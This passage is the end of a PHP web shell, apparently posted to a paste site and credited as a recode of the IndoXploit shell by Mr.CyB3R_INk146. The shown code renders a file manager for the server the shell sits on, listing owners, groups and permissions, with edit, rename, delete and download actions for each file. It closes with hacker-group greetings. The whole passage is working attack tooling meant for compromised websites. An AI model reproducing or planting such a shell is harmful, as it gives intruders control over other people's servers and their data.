  2281. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  2282. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  2283. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  2284. echo "</tr>";
  2285. }
  2286. }
  2287. } else {
  2288. echo "<font color=red>can't open directory.</font>";
  2289. }
  2290. foreach($scandir as $file) {
  2291. $ftype = filetype("$dir/$file");
  2292. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  2293. $size = filesize("$dir/$file")/1024;
  2294. $size = round($size,3);
  2295. if(function_exists('posix_getpwuid')) {
  2296. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  2297. $fowner = $fowner['name'];
  2298. } else {
  2299. //$downer = $uid;
  2300. $fowner = fileowner("$dir/$file");
  2301. }
  2302. if(function_exists('posix_getgrgid')) {
  2303. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  2304. $fgrp = $fgrp['name'];
  2305. } else {
  2306. $fgrp = filegroup("$dir/$file");
  2307. }
  2308. if($size > 1024) {
  2309. $size = round($size/1024,2). 'MB';
  2310. } else {
  2311. $size = $size. 'KB';
  2312. }
  2313. if(!is_file("$dir/$file")) continue;
  2314. echo "<tr>";
  2315. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  2316. echo "<td class='td_home'><center>$ftype</center></td>";
  2317. echo "<td class='td_home'><center>$size</center></td>";
  2318. echo "<td class='td_home'><center>$ftime</center></td>";
  2319. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  2320. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  2321. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>Edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>Rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>Delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>Download</a></td>";
  2322. echo "</tr>";
  2323. }
  2324. echo "</table>";
  2325. if(!is_readable($dir)) {
  2326. //
  2327. } else {
  2328. echo "<hr>";
  2329. }
  2330. } if($_GET['do'] == 'tolo') {
  2331. echo "<br><br><br>Shell Recoded by Mr.CyB3R_INk146 - 1ntr0ver7_Tersakiti
  2332. <br><br><font color='red'>Thanks to:</font><br> 5iNON!MOU23 ~ Mr-Andraz404 ~ Fx_Fri3nds_ ~ Mr.Oz ~ Mr.Crabs ~ ./Mr.HanzID ~ Peoplehurt1337 ~ Gend3ruw0 ~ ./Mister-Y404 ~ Mr. Hurted ~ ./D14 ~ Mr.CyB3R_INk146";
  2333. echo "<br> Recoded From <font color='lime'>IndoXploit</font></center><center>";
  2334.  
  2335. }
  2336. echo "<center>Copyright &copy; ".date("Y")." - <a href='#' target='_blank'><font color=red>Mr.CyB3R_INk146 </font></a></center>";
  2337. ?>
  2338. </html>
Add Comment
Please, Sign In to add comment